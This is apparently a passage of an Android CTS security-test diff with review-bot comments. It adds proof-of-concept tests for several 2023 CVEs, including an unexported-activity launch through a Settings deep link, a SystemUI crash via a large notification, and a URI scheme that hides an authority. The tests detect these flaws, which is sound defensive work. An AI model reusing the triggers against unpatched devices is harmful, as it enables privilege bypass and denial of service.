+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ Context context = instrumentation.getContext();
+ final String installCaCertificateWarningActivity =
+ context.getString(R.string.cve_2023_20960_unexportedActivity);
+ String settingsPackageName =
+ context.getString(R.string.cve_2023_20960_settingsPackageName);
+
+ // Retrieve Settings app's package name
+ ResolveInfo info =
+ context.getPackageManager()
+ .resolveActivityAsUser(
+ new Intent(Settings.ACTION_SETTINGS),
+ PackageManager.MATCH_SYSTEM_ONLY,
+ UserHandle.USER_SYSTEM);
+ if (info != null && info.activityInfo != null) {
+ settingsPackageName = info.activityInfo.packageName;
+ }
+
+ // Attempt to launch unexported Activity using Settings app
+ uiAutomation.adoptShellPermissionIdentity(
+ android.Manifest.permission.LAUNCH_MULTI_PANE_SETTINGS_DEEP_LINK,
+ android.Manifest.permission.INTERACT_ACROSS_USERS);
+ context.startActivity(
+ new Intent(Settings.ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY)
+ .putExtra(
+ Settings.EXTRA_SETTINGS_EMBEDDED_DEEP_LINK_INTENT_URI,
+ context.getString(R.string.cve_2023_20960_uriStringIntent)
+ + context.getString(
+ R.string.cve_2023_20960_uriStringComponent)
+ + settingsPackageName
+ + context.getString(
+ R.string.cve_2023_20960_forwardSlash)
+ + installCaCertificateWarningActivity
+ + context.getString(
+ R.string.cve_2023_20960_uriStringSuffix))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Check if unexported activity 'InstallCaCertificateWarning' is launched
+ String activityDump =
+ uiDevice.executeShellCommand(
+ context.getString(
+ R.string.cve_2023_20960_dumpsysActivityCmd,
+ settingsPackageName + installCaCertificateWarningActivity));
+
+ Pattern resumedTruePattern =
+ Pattern.compile(
+ context.getString(R.string.cve_2023_20960_mResumedTruePattern),
+ Pattern.CASE_INSENSITIVE);
+
+ // Wait for dumpsys result to update
+ int iteration = 0;
+ while (!resumedTruePattern.matcher(activityDump).find() && iteration <= 5) {
+ Thread.sleep(100);
+ activityDump =
+ uiDevice.executeShellCommand(
+ context.getString(
+ R.string.cve_2023_20960_dumpsysActivityCmd,
+ settingsPackageName + installCaCertificateWarningActivity));
+ iteration++;
+ }
+
+ assertFalse(
+ context.getString(R.string.cve_2023_20960_failMsg),
+ resumedTruePattern.matcher(activityDump).find());
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiAutomation.dropShellPermissionIdentity();
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
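Review bot: The wait loop `while (!resumedTruePattern.matcher(activityDump).find() && iteration <= 5)` gives the activity at most six 100 ms retries to show up as resumed, and running out of retries falls through to `assertFalse(...)` as a pass. On a slow or loaded device an affected build could therefore be reported as fixed. A longer bounded wait held in a named constant would be safer, and the `poll` helper that CVE_2023_21143.java imports from `com.android.sts.common.SystemUtil` in this same change may already fit; a comment above the loop should state the chosen timeout and why. In `finally`, `uiDevice.pressHome()` is skipped whenever `uiAutomation.dropShellPermissionIdentity()` throws, so the two calls are better placed in separate `try` blocks.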
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21143.java b/tests/tests/security/src/android/security/cts/CVE_2023_21143.java
new file mode 100644
index 0000000..756782b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21143.java
@@ -0,0 +1,131 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.service.notification.StatusBarNotification;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21143 extends StsExtraBusinessLogicTestCase {
+ private Instrumentation mInstrumentation = null;
+
+ @Test
+ @AsbSecurityTest(cveBugId = 268193777)
+ public void testPocCVE_2023_21143() {
+ Context context = null;
+ try {
+ mInstrumentation = getInstrumentation();
+ context = mInstrumentation.getContext();
+
+ // Getting pid of com.android.systemui
+ final String systemuiPidCommand = context.getString(R.string.systemuiPidCommand);
+ final int initialPidOfSystemUI = getPid(systemuiPidCommand);
+ assumeTrue(context.getString(R.string.noPidFound), initialPidOfSystemUI != -1);
+
+ // Adding a remoteview with large size image to notification in order to reproduce the
+ // vulnerability
+ final String packageName = context.getPackageName();
+ RemoteViews remoteView = new RemoteViews(packageName, R.layout.cve_2023_21143);
+ NotificationChannel channel =
+ new NotificationChannel(
+ context.getString(R.string.channelId),
+ context.getString(R.string.channelName),
+ NotificationManager.IMPORTANCE_HIGH);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(channel);
+ Notification notification =
+ new Notification.Builder(context, context.getString(R.string.channelId))
+ .setContentText(context.getString(R.string.notificationText))
+ .setSmallIcon(Icon.createWithData(new byte[0], 0, 0))
+ .setCustomContentView(remoteView)
+ .build();
+ notificationManager.notify(1, notification);
+
+ // Assumption failure if notification has not been posted successfully.
+ assumeTrue(
+ context.getString(R.string.notificationSendingFailed),
+ poll(
+ () -> {
+ for (StatusBarNotification sbn :
+ notificationManager.getActiveNotifications()) {
+ if (sbn.getPackageName().equals(packageName)) {
+ return true;
+ }
+ }
+ return false;
+ }));
+
+ // Without fix, the systemui crashes and it's pid changes.
+ // Fail test only if pid has changed and notification is still visible.
+ boolean isDeviceVulnerable = false;
+ if (poll(() -> getPid(systemuiPidCommand) != initialPidOfSystemUI)) {
+ for (StatusBarNotification sbn : notificationManager.getActiveNotifications()) {
+ isDeviceVulnerable = sbn.getPackageName().equals(context.getPackageName());
+ if (isDeviceVulnerable) {
+ break;
+ }
+ }
+ }
+ assertFalse(context.getString(R.string.failMsg), isDeviceVulnerable);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // In case of without fix, a crash window stays.
+ SystemUtil.runShellCommand(
+ mInstrumentation, context.getString(R.string.shellCommandForHome));
+ } catch (Exception ignore) {
+ // ignore
+ }
+ }
+ }
+
+ private int getPid(String commandToFindPid) {
+ try {
+ // Getting pid of com.android.systemui
+ return Integer.parseInt(
+ SystemUtil.runShellCommand(mInstrumentation, commandToFindPid).trim());
+ } catch (Exception e) {
+ // ignore and return -1
+ return -1;
+ }
+ }
+}
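Review bot: The `finally` block of `testPocCVE_2023_21143` only sends the device home; the notification posted with id 1 and the channel created for it are never removed, so on a device without the fix the notification stays active after the test and may keep affecting SystemUI for later tests. Hoisting `notificationManager` out of the `try` and adding `notificationManager.cancel(1);` and `notificationManager.deleteNotificationChannel(context.getString(R.string.channelId));` to the cleanup would restore device state. Separately, `getPid` returns -1 for any shell or parse failure, so `poll(() -> getPid(systemuiPidCommand) != initialPidOfSystemUI)` treats a transient command failure the same as a SystemUI restart. A comment on `getPid` saying that -1 also covers "process not running" would make that intent explicit.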
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21246.java b/tests/tests/security/src/android/security/cts/CVE_2023_21246.java
new file mode 100644
index 0000000..fd87dbd
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21246.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.content.pm.ShortcutInfo;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21246 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 273729476)
+ @Test
+ public void testPocCVE_2023_21246() {
+ try {
+ // Set shortcutIdLength = 10 * MAX_ID_LENGTH where value of MAX_ID_LENGTH is set to 1000
+ // in fix patch
+ final int shortcutIdLength = 10000;
+
+ // Create shortcutInfo object with shortcutId of length 10000
+ ShortcutInfo shortcutInfo =
+ new ShortcutInfo.Builder(
+ getApplicationContext(),
+ new String(new char[shortcutIdLength])
+ .replace("\0" /* oldChar */, "A" /* newChar */))
+ .build();
+
+ // Fail if shortcutId length is more than or equal to 10000
+ assertFalse(
+ "Device is vulnerable to b/273729476 since length of shortcutId is more than"
+ + " or equal to 10000 hence notification access can be persisted after"
+ + " reboot via a malformed notification listener with super large"
+ + " shortcutId enabled",
+ shortcutInfo.getId().length() >= shortcutIdLength);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
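Review bot: The inline labels `/* oldChar */` and `/* newChar */` in the `ShortcutInfo.Builder` argument describe `String.replace(char, char)`, but the call passes two string literals and so resolves to the `replace(CharSequence, CharSequence)` overload. Using char literals, `.replace('\0' /* oldChar */, 'A' /* newChar */)`, makes the labels accurate and produces the same 10000-character id. The assertion fails only when the id keeps its full length, so the comment above `shortcutIdLength` could state that any truncation by the platform is treated as fixed.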
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21283.java b/tests/tests/security/src/android/security/cts/CVE_2023_21283.java
new file mode 100644
index 0000000..dc3761d
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21283.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.content.ContentProvider;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.telecom.StatusHints;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21283 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 280797684)
+ @Test
+ public void testPocCVE_2023_21283() {
+ try {
+ // Check if the device supports multiple users or not
+ Context context = getContext();
+ assume().withMessage("This device does not support multiple users")
+ .that(context.getSystemService(UserManager.class).supportsMultipleUsers())
+ .isTrue();
+
+ // Create StatusHints object with an icon specified by URI associated with target user.
+ int targetUserId = context.getUserId() + 1;
+ StatusHints hints =
+ new StatusHints(
+ "CVE_2023_21283_user",
+ Icon.createWithContentUri(
+ ContentProvider.maybeAddUserId(
+ EXTERNAL_CONTENT_URI, targetUserId)),
+ null);
+
+ // With fix, getIcon() returns null.
+ assertWithMessage("Vulnerable to b/280797684").that(hints.getIcon()).isNull();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
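Review bot: `int targetUserId = context.getUserId() + 1;` has no comment saying what the value stands for; nothing in the test creates or looks up that user, so it reads as if a second user must exist. A comment such as `// Any user id other than the caller's; the user itself is not created by this test` would make the intent clear. The catch-all `assumeNoException(e)` also means that a `StatusHints` constructor which rejects the icon by throwing ends as a skipped test rather than a pass, which is worth a comment next to the `catch`.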
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_40119.java b/tests/tests/security/src/android/security/cts/CVE_2023_40119.java
new file mode 100644
index 0000000..96a7f29
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_40119.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assume.assumeNoException;
+
+import android.net.Uri;
+import android.os.Parcel;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_40119 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 231476072)
+ @Test
+ public void testPocCVE_2023_40119() {
+ try {
+ Parcel parcel = Parcel.obtain();
+
+ // Create an evil URI passing a scheme (that hides an unsafe authority and the ssp both)
+ // , a fake ssp and a fragment to Uri.fromParts() and write the evil URI to a parcel.
+ Uri.fromParts(
+ "scheme://notAllowedAuthorityAndSsp" /* scheme */,
+ "allowedAuthorityAndSsp" /* scheme-specific-part */,
+ "fragment" /* fragment */)
+ .writeToParcel(parcel, 0 /* No additional flags or options */);
+ parcel.setDataPosition(0);
+
+ Uri uriFromParcel = Uri.CREATOR.createFromParcel(parcel);
+
+ // Without fix, the scheme from parsing the string representation of uriFromParcel will
+ // return "scheme" as Uri parser checks for the delimiter ':' but the scheme from
+ // uriFromParcel.getScheme() will return "scheme://notAllowedAuthorityAndSsp" which
+ // hides the "not allowed" authority ("notAllowedAuthorityAndSsp") in the scheme
+ // enabling bypass of authority checks.
+ assertEquals(
+ "Vulnerable to b/231476072 !!, URIs are not canonicalized across AIDL"
+ + " boundaries",
+ Uri.parse(uriFromParcel.toString()).getScheme(),
+ uriFromParcel.getScheme());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
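Review bot: The `Parcel` obtained at the top of `testPocCVE_2023_40119` is never returned to the pool; every path out of the `try`, including an assertion failure, leaves it unrecycled. Declaring `Parcel parcel = Parcel.obtain();` before the `try` and adding `finally { parcel.recycle(); }` after the existing `catch` fixes that without changing what the test checks.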
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 92f3706..f9ce8df 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -34,6 +34,7 @@
import java.util.HashSet;
import java.util.List;
import java.util.Set;
+import java.util.TreeSet;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
@@ -44,7 +45,7 @@
@RestrictedBuildTest
public void testPackageSignatures() throws Exception {
- Set<String> badPackages = new HashSet<String>();
+ Set<String> badPackages = new TreeSet<>();
Set<Signature> wellKnownSignatures = getWellKnownSignatures();
PackageManager packageManager = mContext.getPackageManager();
@@ -77,7 +78,7 @@
* .bin files when adding entries to this list.
*/
private Set<Signature> getWellKnownSignatures() throws NotFoundException, IOException {
- Set<Signature> wellKnownSignatures = new HashSet<Signature>();
+ Set<Signature> wellKnownSignatures = new HashSet<>();
wellKnownSignatures.add(getSignature(R.raw.sig_media));
wellKnownSignatures.add(getSignature(R.raw.sig_platform));
wellKnownSignatures.add(getSignature(R.raw.sig_shared));
@@ -107,6 +108,83 @@
// won't negatively affect tests to include their signatures here too.
wellKnownSignatures.add(getSignature(R.raw.sig_com_google_android_tzdata));
wellKnownSignatures.add(getSignature(R.raw.sig_com_google_android_tzdata2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_android_telephony_cts_testkey));
+ wellKnownSignatures.add(getSignature(R.raw.sig_build_bazel_examples_apex_minimal));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adbd));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adservices));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adservices_api));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_appsearch));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_art));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_bluetooth));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_btservices));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_car_framework));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_cellbroadcast));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_compos));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_connectivity_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_extservices));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_geotz));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_core_permissions));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_power));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_sensors));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_thermal));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_usb));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_vibrator));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_wifi));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hotspot2_osulogin));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_i18n));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_ipsec));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_mediaprovider));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_neuralnetworks));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_os_statsd));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_permission));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_rkpd));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_runtime));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_safetycenter_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_sdkext));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_uwb));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_uwb_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vibrator_drv2624));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vibrator_sunfish));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_virt));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vndk));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi_dialog));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_google_cf_apex));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_google_emulated_camera_provider_hal));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_helper_cert_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_helper_cert_b));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_hosttest_helper_cert_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_hosttest_helper_cert_b));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_blob_helper_cert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_blob_helper_cert2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_b));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_c));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_ec_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_net_app));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_testkey1));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_testkey2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_uicc_2021));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_3));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_4));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_5));
+ wellKnownSignatures.add(getSignature(R.raw.sig_keyset_A));
+ wellKnownSignatures.add(getSignature(R.raw.sig_keyset_B));
+ wellKnownSignatures.add(getSignature(R.raw.sig_rro_remounted_test_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_rsa_2048));
+ wellKnownSignatures.add(getSignature(R.raw.sig_sdk_sandbox));
+ wellKnownSignatures.add(getSignature(R.raw.sig_security_cts_test_cert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_shell_as_test_app_key));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_1));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_3));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_4));
+ wellKnownSignatures.add(getSignature(R.raw.sig_testcert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_unit_test));
return wellKnownSignatures;
}
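Review bot: The entries added to `getWellKnownSignatures` include generically named resources such as `sig_cert`, `sig_testcert`, `sig_unit_test` and `sig_rsa_2048`, and nothing in the hunk records which published key each one corresponds to. This set appears to decide which packages `testPackageSignatures` reports as signed with a known key, so a grouping comment per source (for example `// APEX test keys`, `// CTS helper app keys`) would let an auditor check an entry against its `.bin` file. With this many entries, the repeated `wellKnownSignatures.add(getSignature(...))` lines could also become a `static final int[]` of resource ids iterated in a loop. The method begins before this hunk, so the existing entries would need the same treatment.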
diff --git a/tests/tests/security/src/android/security/cts/PersistableBundleTest.java b/tests/tests/security/src/android/security/cts/PersistableBundleTest.java
new file mode 100644
index 0000000..e7780e4
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/PersistableBundleTest.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+
+import android.os.PersistableBundle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.ext.junit.runners.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.ByteArrayInputStream;
+
+@RunWith(AndroidJUnit4.class)
+public class PersistableBundleTest extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 247513680)
+ @Test
+ public void testReadFromStream_invalidType() throws Exception {
+ String input = "<bundle><string name=\"key\">value</string>"
+ + "<byte-array name=\"invalid\" num=\"2\">ffff</byte-array></bundle>";
+ ByteArrayInputStream inputStream = new ByteArrayInputStream(input.getBytes());
+
+ // Reading from the stream with invalid type should not throw an exception
+ PersistableBundle restoredBundle = PersistableBundle.readFromStream(inputStream);
+
+ // verify invalid type is ignored
+ assertFalse(restoredBundle.containsKey("invalid"));
+ // verify valid type exists
+ assertEquals("value", restoredBundle.getString("key"));
+ }
+}
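Review bot: `input.getBytes()` in `testReadFromStream_invalidType` encodes the XML with the platform default charset; `input.getBytes(StandardCharsets.UTF_8)` (with an import of `java.nio.charset.StandardCharsets`) states the encoding the parser is given. The comment `// Reading from the stream with invalid type should not throw an exception` could also say what is invalid here, presumably the `byte-array` element that the assertions below expect to be dropped.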
diff --git a/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml b/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
index 4c62187..9e2deeb 100644
--- a/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxephemeral.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
index efdc4bd..da08049 100644
--- a/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk25.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
index 8449ea9..b94757c 100644
--- a/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk27.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
index b6b1baa..97d15c5 100644
--- a/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk28.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
index b37d05b..3e4e7c4 100644
--- a/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk29.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
index 80d5e6c..9b40d00 100644
--- a/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk30.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
